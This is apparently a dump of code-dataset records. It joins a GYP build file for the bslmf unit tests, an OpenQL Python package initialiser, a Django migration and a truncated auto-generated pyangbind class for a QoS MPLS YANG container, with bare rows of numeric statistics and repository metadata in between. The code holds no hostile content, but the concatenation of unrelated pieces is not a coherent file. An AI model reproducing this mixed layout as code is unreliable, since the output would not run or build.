'<(PRODUCT_DIR)/bslmf_isbitwiseequalitycomparable.t', '<(PRODUCT_DIR)/bslmf_isbitwisemoveable.t', '<(PRODUCT_DIR)/bslmf_isclass.t', '<(PRODUCT_DIR)/bslmf_isconst.t', '<(PRODUCT_DIR)/bslmf_isconvertible.t', '<(PRODUCT_DIR)/bslmf_isconvertibletoany.t', '<(PRODUCT_DIR)/bslmf_isenum.t', '<(PRODUCT_DIR)/bslmf_isfloatingpoint.t', '<(PRODUCT_DIR)/bslmf_isfunction.t', '<(PRODUCT_DIR)/bslmf_isfundamental.t', '<(PRODUCT_DIR)/bslmf_isintegral.t', '<(PRODUCT_DIR)/bslmf_islvaluereference.t', '<(PRODUCT_DIR)/bslmf_ismemberfunctionpointer.t', '<(PRODUCT_DIR)/bslmf_ismemberobjectpointer.t', '<(PRODUCT_DIR)/bslmf_ismemberpointer.t', '<(PRODUCT_DIR)/bslmf_ispair.t', '<(PRODUCT_DIR)/bslmf_ispointer.t', '<(PRODUCT_DIR)/bslmf_ispointertomember.t', '<(PRODUCT_DIR)/bslmf_ispolymorphic.t', '<(PRODUCT_DIR)/bslmf_isreference.t', '<(PRODUCT_DIR)/bslmf_isrvaluereference.t', '<(PRODUCT_DIR)/bslmf_issame.t', '<(PRODUCT_DIR)/bslmf_istriviallycopyable.t', '<(PRODUCT_DIR)/bslmf_istriviallydefaultconstructible.t', '<(PRODUCT_DIR)/bslmf_isvoid.t', '<(PRODUCT_DIR)/bslmf_isvolatile.t', '<(PRODUCT_DIR)/bslmf_matchanytype.t', '<(PRODUCT_DIR)/bslmf_matcharithmetictype.t', '<(PRODUCT_DIR)/bslmf_memberfunctionpointertraits.t', '<(PRODUCT_DIR)/bslmf_metaint.t', '<(PRODUCT_DIR)/bslmf_nestedtraitdeclaration.t', '<(PRODUCT_DIR)/bslmf_nil.t', '<(PRODUCT_DIR)/bslmf_removeconst.t', '<(PRODUCT_DIR)/bslmf_removecv.t', '<(PRODUCT_DIR)/bslmf_removecvq.t', '<(PRODUCT_DIR)/bslmf_removepointer.t', '<(PRODUCT_DIR)/bslmf_removereference.t', '<(PRODUCT_DIR)/bslmf_removevolatile.t', '<(PRODUCT_DIR)/bslmf_selecttrait.t', '<(PRODUCT_DIR)/bslmf_switch.t', '<(PRODUCT_DIR)/bslmf_tag.t', '<(PRODUCT_DIR)/bslmf_typelist.t', ], 'bslmf_pkgdeps': [ '../bsls/bsls.gyp:bsls', '../bslscm/bslscm.gyp:bslscm', ], }, 'targets': [ { 'target_name': 'bslmf_sources', 'type': 'none', 'direct_dependent_settings': { 'sources': [ '<@(bslmf_sources)' ], 'include_dirs': [ '.' 
], }, }, { 'target_name': 'bslmf_tests_build', 'type': 'none', 'dependencies': [ '<@(bslmf_tests)' ], }, { 'target_name': 'bslmf_tests_run', 'type': 'none', 'dependencies': [ 'bslmf_tests_build' ], 'sources': [ '<@(bslmf_tests_paths)' ], 'rules': [ { 'rule_name': 'run_unit_tests', 'extension': 't', 'inputs': [ '<@(bslmf_tests_paths)' ], 'outputs': [ '<(INTERMEDIATE_DIR)/<(RULE_INPUT_ROOT).t.ran' ], 'action': [ '<(python_path)', '<(DEPTH)/tools/run_unit_tests.py', '<(RULE_INPUT_PATH)', '<@(_outputs)', '--abi=<(ABI_bits)', '--lib=<(library)' ], 'msvs_cygwin_shell': 0, }, ], }, { 'target_name': 'bslmf', 'type': '<(library)', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf_sources', ], 'export_dependent_settings': [ '<@(bslmf_pkgdeps)' ], 'direct_dependent_settings': { 'include_dirs': [ '.' ] }, # Mac OS X empty LD_DYLIB_INSTALL_NAME causes executable and shared # libraries linking against dylib to store same path for use at runtime 'xcode_settings': { 'LD_DYLIB_INSTALL_NAME': '' }, }, { 'target_name': 'bslmf_addconst.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_addconst.t.cpp' ], }, { 'target_name': 'bslmf_addcv.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_addcv.t.cpp' ], }, { 'target_name': 'bslmf_addlvaluereference.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_addlvaluereference.t.cpp' ], }, { 'target_name': 'bslmf_addpointer.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' 
], 'sources': [ 'bslmf_addpointer.t.cpp' ], }, { 'target_name': 'bslmf_addreference.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_addreference.t.cpp' ], }, { 'target_name': 'bslmf_addrvaluereference.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_addrvaluereference.t.cpp' ], }, { 'target_name': 'bslmf_addvolatile.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_addvolatile.t.cpp' ], }, { 'target_name': 'bslmf_arraytopointer.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_arraytopointer.t.cpp' ], }, { 'target_name': 'bslmf_assert.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_assert.t.cpp' ], }, { 'target_name': 'bslmf_conditional.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_conditional.t.cpp' ], }, { 'target_name': 'bslmf_detectnestedtrait.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_detectnestedtrait.t.cpp' ], }, { 'target_name': 'bslmf_enableif.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_enableif.t.cpp' ], }, { 'target_name': 'bslmf_forwardingtype.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' 
], 'sources': [ 'bslmf_forwardingtype.t.cpp' ], }, { 'target_name': 'bslmf_functionpointertraits.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_functionpointertraits.t.cpp' ], }, { 'target_name': 'bslmf_haspointersemantics.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_haspointersemantics.t.cpp' ], }, { 'target_name': 'bslmf_if.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_if.t.cpp' ], }, { 'target_name': 'bslmf_integralconstant.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_integralconstant.t.cpp' ], }, { 'target_name': 'bslmf_isarithmetic.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isarithmetic.t.cpp' ], }, { 'target_name': 'bslmf_isarray.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isarray.t.cpp' ], }, { 'target_name': 'bslmf_isbitwiseequalitycomparable.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isbitwiseequalitycomparable.t.cpp' ], }, { 'target_name': 'bslmf_isbitwisemoveable.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isbitwisemoveable.t.cpp' ], }, { 'target_name': 'bslmf_isclass.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' 
], 'sources': [ 'bslmf_isclass.t.cpp' ], }, { 'target_name': 'bslmf_isconst.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isconst.t.cpp' ], }, { 'target_name': 'bslmf_isconvertible.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isconvertible.t.cpp' ], }, { 'target_name': 'bslmf_isconvertibletoany.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isconvertibletoany.t.cpp' ], }, { 'target_name': 'bslmf_isenum.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isenum.t.cpp' ], }, { 'target_name': 'bslmf_isfloatingpoint.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isfloatingpoint.t.cpp' ], }, { 'target_name': 'bslmf_isfunction.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isfunction.t.cpp' ], }, { 'target_name': 'bslmf_isfundamental.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isfundamental.t.cpp' ], }, { 'target_name': 'bslmf_isintegral.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isintegral.t.cpp' ], }, { 'target_name': 'bslmf_islvaluereference.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' 
], 'sources': [ 'bslmf_islvaluereference.t.cpp' ], }, { 'target_name': 'bslmf_ismemberfunctionpointer.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_ismemberfunctionpointer.t.cpp' ], }, { 'target_name': 'bslmf_ismemberobjectpointer.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_ismemberobjectpointer.t.cpp' ], }, { 'target_name': 'bslmf_ismemberpointer.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_ismemberpointer.t.cpp' ], }, { 'target_name': 'bslmf_ispair.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_ispair.t.cpp' ], }, { 'target_name': 'bslmf_ispointer.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_ispointer.t.cpp' ], }, { 'target_name': 'bslmf_ispointertomember.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_ispointertomember.t.cpp' ], }, { 'target_name': 'bslmf_ispolymorphic.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_ispolymorphic.t.cpp' ], }, { 'target_name': 'bslmf_isreference.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isreference.t.cpp' ], }, { 'target_name': 'bslmf_isrvaluereference.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' 
], 'sources': [ 'bslmf_isrvaluereference.t.cpp' ], }, { 'target_name': 'bslmf_issame.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_issame.t.cpp' ], }, { 'target_name': 'bslmf_istriviallycopyable.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_istriviallycopyable.t.cpp' ], }, { 'target_name': 'bslmf_istriviallydefaultconstructible.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_istriviallydefaultconstructible.t.cpp' ], }, { 'target_name': 'bslmf_isvoid.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isvoid.t.cpp' ], }, { 'target_name': 'bslmf_isvolatile.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_isvolatile.t.cpp' ], }, { 'target_name': 'bslmf_matchanytype.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_matchanytype.t.cpp' ], }, { 'target_name': 'bslmf_matcharithmetictype.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_matcharithmetictype.t.cpp' ], }, { 'target_name': 'bslmf_memberfunctionpointertraits.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' 
], 'sources': [ 'bslmf_memberfunctionpointertraits.t.cpp' ], }, { 'target_name': 'bslmf_metaint.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_metaint.t.cpp' ], }, { 'target_name': 'bslmf_nestedtraitdeclaration.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_nestedtraitdeclaration.t.cpp' ], }, { 'target_name': 'bslmf_nil.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_nil.t.cpp' ], }, { 'target_name': 'bslmf_removeconst.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_removeconst.t.cpp' ], }, { 'target_name': 'bslmf_removecv.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_removecv.t.cpp' ], }, { 'target_name': 'bslmf_removecvq.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_removecvq.t.cpp' ], }, { 'target_name': 'bslmf_removepointer.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_removepointer.t.cpp' ], }, { 'target_name': 'bslmf_removereference.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_removereference.t.cpp' ], }, { 'target_name': 'bslmf_removevolatile.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' 
], 'sources': [ 'bslmf_removevolatile.t.cpp' ], }, { 'target_name': 'bslmf_selecttrait.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_selecttrait.t.cpp' ], }, { 'target_name': 'bslmf_switch.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_switch.t.cpp' ], }, { 'target_name': 'bslmf_tag.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_tag.t.cpp' ], }, { 'target_name': 'bslmf_typelist.t', 'type': 'executable', 'dependencies': [ '../bsl_deps.gyp:bsl_grpdeps', '<@(bslmf_pkgdeps)', 'bslmf' ], 'include_dirs': [ '.' ], 'sources': [ 'bslmf_typelist.t.cpp' ], }, ], }
34.64898
77
0.539247
2,229
25,467
5.834455
0.061463
0.049981
0.074971
0.104883
0.504114
0.411842
0.411842
0.411842
0.411842
0.408074
0
0.000054
0.269918
25,467
734
78
34.696185
0.699403
0.005301
0
0.350205
0
0
0.589048
0.308026
0
0
0
0
0.00684
1
0
true
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
1
99cf64985f998c65d2cacfaacd8edb39224b3b22
558
py
Python
swig/openql/__init__.py
mmoelle1/OpenQL
7d9e084cd3ecd237c9ea280801529d96cf67369a
[ "Apache-2.0" ]
null
null
null
swig/openql/__init__.py
mmoelle1/OpenQL
7d9e084cd3ecd237c9ea280801529d96cf67369a
[ "Apache-2.0" ]
null
null
null
swig/openql/__init__.py
mmoelle1/OpenQL
7d9e084cd3ecd237c9ea280801529d96cf67369a
[ "Apache-2.0" ]
1
2022-01-04T20:51:43.000Z
2022-01-04T20:51:43.000Z
# Author Imran Ashraf

# Package initializer: the import syntax differs slightly between
# Python 2 and 3, so detect the running major version first.
from sys import version_info

if version_info[0] not in (2, 3):
    raise EnvironmentError("sys.version_info refers to a version of "
        "Python neither 2 nor 3. This is not permitted. "
        "sys.version_info = {}".format(version_info))

# True on Python 3, False on Python 2 (any other version raised above).
PY3 = version_info[0] == 3

if PY3:
    from .openql import Program, Kernel
else:
    from openql import *

# __all__ = [ init, schedule, compile ]
25.363636
69
0.689964
83
558
4.518072
0.614458
0.176
0.069333
0
0
0
0
0
0
0
0
0.025463
0.225806
558
21
70
26.571429
0.842593
0.297491
0
0.153846
0
0
0.27907
0
0
0
0
0
0
1
0
false
0
0.230769
0
0.230769
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
99cf8bd15e6bfe4f73e426de65fa4c30ca3db7fc
573
py
Python
campaigns/migrations/0010_auto_20181117_2234.py
alimahdiyar/Developing-Community-Web
a663a687e0f286f197d4a7bf347f67cd130275f7
[ "MIT" ]
2
2018-06-02T12:30:00.000Z
2018-07-19T14:41:39.000Z
campaigns/migrations/0010_auto_20181117_2234.py
Developing-Community/Developing-Community-Web
a663a687e0f286f197d4a7bf347f67cd130275f7
[ "MIT" ]
5
2021-06-08T19:09:00.000Z
2022-03-11T23:25:14.000Z
campaigns/migrations/0010_auto_20181117_2234.py
Developing-Community/web
a663a687e0f286f197d4a7bf347f67cd130275f7
[ "MIT" ]
2
2018-05-27T14:58:34.000Z
2018-05-27T15:03:04.000Z
# Generated by Django 2.0.9 on 2018-11-17 22:34 import campaigns.models from django.db import migrations import sorl.thumbnail.fields class Migration(migrations.Migration): dependencies = [ ('campaigns', '0009_auto_20181116_1943'), ] operations = [ migrations.AlterField( model_name='campaign', name='image', field=sorl.thumbnail.fields.ImageField(blank=True, height_field='height_field', null=True, upload_to=campaigns.models.campaign_image_upload_location, width_field='width_field'), ), ]
27.285714
189
0.685864
67
573
5.686567
0.656716
0.07874
0.099738
0
0
0
0
0
0
0
0
0.068132
0.205934
573
20
190
28.65
0.769231
0.078534
0
0
1
0
0.129278
0.043726
0
0
0
0
0
1
0
false
0
0.214286
0
0.428571
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
99cfce15f277b305b1d6cfb0628ad6ec4ccc88f5
16,919
py
Python
pybind/slxos/v17r_2_00/qos_mpls/map_apply/apply_traffic_class_exp_map_name/__init__.py
extremenetworks/pybind
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
[ "Apache-2.0" ]
null
null
null
pybind/slxos/v17r_2_00/qos_mpls/map_apply/apply_traffic_class_exp_map_name/__init__.py
extremenetworks/pybind
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
[ "Apache-2.0" ]
null
null
null
pybind/slxos/v17r_2_00/qos_mpls/map_apply/apply_traffic_class_exp_map_name/__init__.py
extremenetworks/pybind
44c467e71b2b425be63867aba6e6fa28b2cfe7fb
[ "Apache-2.0" ]
1
2021-11-05T22:15:42.000Z
2021-11-05T22:15:42.000Z
# NOTE(review): auto-generated pyangbind bindings, Python 2 only
# (`import __builtin__`, `unicode`) — regenerate rather than hand-edit.
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__


class apply_traffic_class_exp_map_name(PybindBase):
  """
  This class was auto-generated by the PythonClass plugin for PYANG
  from YANG module brocade-qos-mpls - based on the path
  /qos-mpls/map-apply/apply-traffic-class-exp-map-name. Each member
  element of the container is represented as a class variable - with
  a specific YANG type.
  """
  __slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__map_name_cmd2','__all_zero_map_cmd2','__default_map_cmd2','__All_cmd2',)

  _yang_name = 'apply-traffic-class-exp-map-name'
  _rest_name = 'traffic-class-exp'

  _pybind_generated_by = 'container'

  def __init__(self, *args, **kwargs):
    # Resolve the XPath helper: explicit kwarg wins, then the parent's,
    # otherwise disabled.
    path_helper_ = kwargs.pop("path_helper", None)
    if path_helper_ is False:
      self._path_helper = False
    elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
      self._path_helper = path_helper_
    elif hasattr(self, "_parent"):
      path_helper_ = getattr(self._parent, "_path_helper", False)
      self._path_helper = path_helper_
    else:
      self._path_helper = False

    # Resolve extension methods the same way (kwarg, then parent, then off).
    extmethods = kwargs.pop("extmethods", None)
    if extmethods is False:
      self._extmethods = False
    elif extmethods is not None and isinstance(extmethods, dict):
      self._extmethods = extmethods
    elif hasattr(self, "_parent"):
      extmethods = getattr(self._parent, "_extmethods", None)
      self._extmethods = extmethods
    else:
      self._extmethods = False

    # Default values for the container's leaves; three of them belong to the
    # 'apply-traffic-class-exp' choice, so setting one clears the others.
    self.__default_map_cmd2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="default-map-cmd2", rest_name="default-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-default-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP based on default map', u'alt-name': u'default-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)
    self.__map_name_cmd2 = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'pattern': u'[a-zA-Z]{1}([-a-zA-Z0-9_]{0,63})'}), is_leaf=True, yang_name="map-name-cmd2", rest_name="map-name-cmd2", parent=self, choice=(u'apply-traffic-class-exp', u'ca-map-name-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'<MAP NAME>;;Name for the MAP(Max 64)', u'cli-drop-node-name': None, u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='map-name-type', is_config=True)
    self.__All_cmd2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="All-cmd2", rest_name="All", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Apply globally on all interface', u'alt-name': u'All'}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)
    self.__all_zero_map_cmd2 = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="all-zero-map-cmd2", rest_name="all-zero-map", parent=self, choice=(u'apply-traffic-class-exp', u'ca-all-zero-map-cmd2'), path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Map traffic-class and drop prec to EXP 0', u'alt-name': u'all-zero-map', u'cli-incomplete-command': None}}, namespace='urn:brocade.com:mgmt:brocade-apply-qos-mpls', defining_module='brocade-apply-qos-mpls', yang_type='empty', is_config=True)

    # Optional positional argument: copy changed elements from a compatible
    # source object (a container with the same pyangbind elements).
    load = kwargs.pop("load", None)
    if args:
      if len(args) > 1:
        raise TypeError("cannot create a YANG container with >1 argument")
      all_attr = True
      for e in self._pyangbind_elements:
        if not hasattr(args[0], e):
          all_attr = False
          break
      if not all_attr:
        raise ValueError("Supplied object did not have the correct attributes")
      for e in self._pyangbind_elements:
        nobj = getattr(args[0], e)
        if nobj._changed() is False:
          continue
        setmethod = getattr(self, "_set_%s" % e)
        if load is None:
          setmethod(getattr(args[0], e))
        else:
          setmethod(getattr(args[0], e), load=load)

  def _path(self):
    # YANG data path of this container (parent-relative when attached).
    if hasattr(self, "_parent"):
      return self._parent._path()+[self._yang_name]
    else:
      return [u'qos-mpls', u'map-apply', u'apply-traffic-class-exp-map-name']

  def _rest_path(self):
    # REST path; a container with an empty rest name is skipped in the path.
    if hasattr(self, "_parent"):
      if self._rest_name:
        return self._parent._rest_path()+[self._rest_name]
      else:
        return self._parent._rest_path()
    else:
      return [u'qos-mpls', u'map-apply', u'traffic-class-exp']

  def _get_map_name_cmd2(self):
    """
